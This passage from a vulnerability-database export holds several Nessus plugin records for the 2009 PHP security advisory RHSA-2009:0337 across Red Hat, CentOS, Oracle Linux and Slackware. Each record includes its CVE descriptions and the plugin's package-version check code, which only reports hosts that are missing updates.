script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 3.x / 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2009:0337\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL3\", reference:\"php-4.3.2-51.ent\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"php-devel-4.3.2-51.ent\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"php-imap-4.3.2-51.ent\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"php-ldap-4.3.2-51.ent\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"php-mysql-4.3.2-51.ent\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"php-odbc-4.3.2-51.ent\")) flag++;\n\n if (rpm_check(release:\"RHEL3\", reference:\"php-pgsql-4.3.2-51.ent\")) flag++;\n\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-devel-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-domxml-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-gd-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-imap-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-ldap-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-mbstring-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-mysql-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-ncurses-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-odbc-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-pear-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-pgsql-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-snmp-4.3.9-3.22.15\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"php-xmlrpc-4.3.9-3.22.15\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-devel / php-domxml / php-gd / php-imap / php-ldap / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:11:34", "bulletinFamily": "scanner", "description": "Updated php packages that fix several security issues are now available for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring extension. A remote attacker able to pass arbitrary input to a PHP script using mbstring conversion functions could cause the PHP interpreter to crash or, possibly, execute arbitrary code.\n(CVE-2008-5557)\n\nA flaw was found in the handling of the 'mbstring.func_overload' configuration setting. A value set for one virtual host, or in a user's .htaccess file, was incorrectly applied to other virtual hosts on the same server, causing the handling of multibyte character strings to not work correctly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a PHP script allowed a remote attacker to load a carefully crafted font file, it could cause the PHP interpreter to crash or, possibly, execute arbitrary code. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when running in FastCGI mode. If the PHP interpreter was being executed via FastCGI, a remote attacker could create a request which would cause the PHP interpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's imagerotate function. A remote attacker able to pass arbitrary values as the 'background color' argument of the function could, possibly, view portions of the PHP interpreter's memory. (CVE-2008-5498)\n\nAll php users are advised to upgrade to these updated packages, which contain backported patches to resolve these issues. The httpd web server must be restarted for the changes to take effect.", "modified": "2018-11-10T00:00:00", "id": "CENTOS_RHSA-2009-0337.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=36089", "published": "2009-04-07T00:00:00", "title": "CentOS 3 / 4 : php (CESA-2009:0337)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2009:0337 and \n# CentOS Errata and Security Advisory 2009:0337 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(36089);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/11/10 11:49:28\");\n\n script_cve_id(\"CVE-2008-3658\", \"CVE-2008-3660\", \"CVE-2008-5498\", \"CVE-2008-5557\", \"CVE-2009-0754\");\n script_bugtraq_id(30649, 31612, 32948, 33002, 33542);\n script_xref(name:\"RHSA\", value:\"2009:0337\");\n\n script_name(english:\"CentOS 3 / 4 : php (CESA-2009:0337)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated php packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring\nextension. A remote attacker able to pass arbitrary input to a PHP\nscript using mbstring conversion functions could cause the PHP\ninterpreter to crash or, possibly, execute arbitrary code.\n(CVE-2008-5557)\n\nA flaw was found in the handling of the 'mbstring.func_overload'\nconfiguration setting. A value set for one virtual host, or in a\nuser's .htaccess file, was incorrectly applied to other virtual hosts\non the same server, causing the handling of multibyte character\nstrings to not work correctly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a\nPHP script allowed a remote attacker to load a carefully crafted font\nfile, it could cause the PHP interpreter to crash or, possibly,\nexecute arbitrary code. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause\nthe PHP interpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's\nimagerotate function. A remote attacker able to pass arbitrary values\nas the 'background color' argument of the function could, possibly,\nview portions of the PHP interpreter's memory. (CVE-2008-5498)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web\nserver must be restarted for the changes to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-April/015718.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?736a5cf1\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-April/015719.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?27731545\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-April/015722.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4f83bf8a\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-April/015723.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?116e646e\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-April/015806.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eb1c4175\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2009-April/015807.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?526df04d\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 119, 134, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/04/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-devel-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-imap-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-ldap-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-mysql-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-odbc-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"php-pgsql-4.3.2-51.ent\")) flag++;\n\nif (rpm_check(release:\"CentOS-4\", reference:\"php-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-devel-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-domxml-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-gd-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-imap-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-ldap-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-mbstring-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-mysql-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-ncurses-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-odbc-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-pear-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-pgsql-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-snmp-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"php-xmlrpc-4.3.9-3.22.15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:19:20", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2009:0337 :\n\nUpdated php packages that fix several security issues are now available for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring extension. A remote attacker able to pass arbitrary input to a PHP script using mbstring conversion functions could cause the PHP interpreter to crash or, possibly, execute arbitrary code.\n(CVE-2008-5557)\n\nA flaw was found in the handling of the 'mbstring.func_overload' configuration setting. A value set for one virtual host, or in a user's .htaccess file, was incorrectly applied to other virtual hosts on the same server, causing the handling of multibyte character strings to not work correctly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a PHP script allowed a remote attacker to load a carefully crafted font file, it could cause the PHP interpreter to crash or, possibly, execute arbitrary code. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when running in FastCGI mode. If the PHP interpreter was being executed via FastCGI, a remote attacker could create a request which would cause the PHP interpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's imagerotate function. A remote attacker able to pass arbitrary values as the 'background color' argument of the function could, possibly, view portions of the PHP interpreter's memory. (CVE-2008-5498)\n\nAll php users are advised to upgrade to these updated packages, which contain backported patches to resolve these issues. The httpd web server must be restarted for the changes to take effect.", "modified": "2018-07-18T00:00:00", "id": "ORACLELINUX_ELSA-2009-0337.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=67817", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 3 / 4 : php (ELSA-2009-0337)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2009:0337 and \n# Oracle Linux Security Advisory ELSA-2009-0337 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67817);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/07/18 17:43:56\");\n\n script_cve_id(\"CVE-2008-3658\", \"CVE-2008-3660\", \"CVE-2008-5498\", \"CVE-2008-5557\", \"CVE-2009-0754\");\n script_bugtraq_id(30649, 31612, 32948, 33002, 33542);\n script_xref(name:\"RHSA\", value:\"2009:0337\");\n\n script_name(english:\"Oracle Linux 3 / 4 : php (ELSA-2009-0337)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2009:0337 :\n\nUpdated php packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nPHP is an HTML-embedded scripting language commonly used with the\nApache HTTP Web server.\n\nA heap-based buffer overflow flaw was found in PHP's mbstring\nextension. A remote attacker able to pass arbitrary input to a PHP\nscript using mbstring conversion functions could cause the PHP\ninterpreter to crash or, possibly, execute arbitrary code.\n(CVE-2008-5557)\n\nA flaw was found in the handling of the 'mbstring.func_overload'\nconfiguration setting. A value set for one virtual host, or in a\nuser's .htaccess file, was incorrectly applied to other virtual hosts\non the same server, causing the handling of multibyte character\nstrings to not work correctly. (CVE-2009-0754)\n\nA buffer overflow flaw was found in PHP's imageloadfont function. If a\nPHP script allowed a remote attacker to load a carefully crafted font\nfile, it could cause the PHP interpreter to crash or, possibly,\nexecute arbitrary code. (CVE-2008-3658)\n\nA flaw was found in the way PHP handled certain file extensions when\nrunning in FastCGI mode. If the PHP interpreter was being executed via\nFastCGI, a remote attacker could create a request which would cause\nthe PHP interpreter to crash. (CVE-2008-3660)\n\nA memory disclosure flaw was found in the PHP gd extension's\nimagerotate function. A remote attacker able to pass arbitrary values\nas the 'background color' argument of the function could, possibly,\nview portions of the PHP interpreter's memory. (CVE-2008-5498)\n\nAll php users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. The httpd web\nserver must be restarted for the changes to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2009-April/000951.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2009-April/000952.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(20, 119, 134, 200);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-domxml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-ncurses\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/04/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3 / 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-devel-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-devel-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-imap-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-imap-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-ldap-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-ldap-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-mysql-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-mysql-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-odbc-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-odbc-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"php-pgsql-4.3.2-51.ent\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"php-pgsql-4.3.2-51.ent\")) flag++;\n\nif (rpm_check(release:\"EL4\", reference:\"php-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-devel-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-domxml-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-gd-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-imap-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-ldap-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-mbstring-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-mysql-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-ncurses-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-odbc-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-pear-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-pgsql-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-snmp-4.3.9-3.22.15\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"php-xmlrpc-4.3.9-3.22.15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php / php-devel / php-domxml / php-gd / php-imap / php-ldap / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:11:34", "bulletinFamily": "scanner", "description": "New php packages are available for Slackware 11.0, 12.0, 12.1, 12.2, and -current to fix security issues.", "modified": "2018-06-27T00:00:00", "id": "SLACKWARE_SSA_2009-098-02.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=36105", "published": "2009-04-08T00:00:00", "title": "Slackware 11.0 / 12.0 / 12.1 / 12.2 / current : php (SSA:2009-098-02)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2009-098-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(36105);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/06/27 18:42:26\");\n\n script_cve_id(\"CVE-2008-5498\");\n script_bugtraq_id(33002);\n script_xref(name:\"SSA\", value:\"2009-098-02\");\n\n script_name(english:\"Slackware 11.0 / 12.0 / 12.1 / 12.2 / current : php (SSA:2009-098-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New php packages are available for Slackware 11.0, 12.0, 12.1, 12.2,\nand -current to fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.381314\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?36e4e7dd\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n 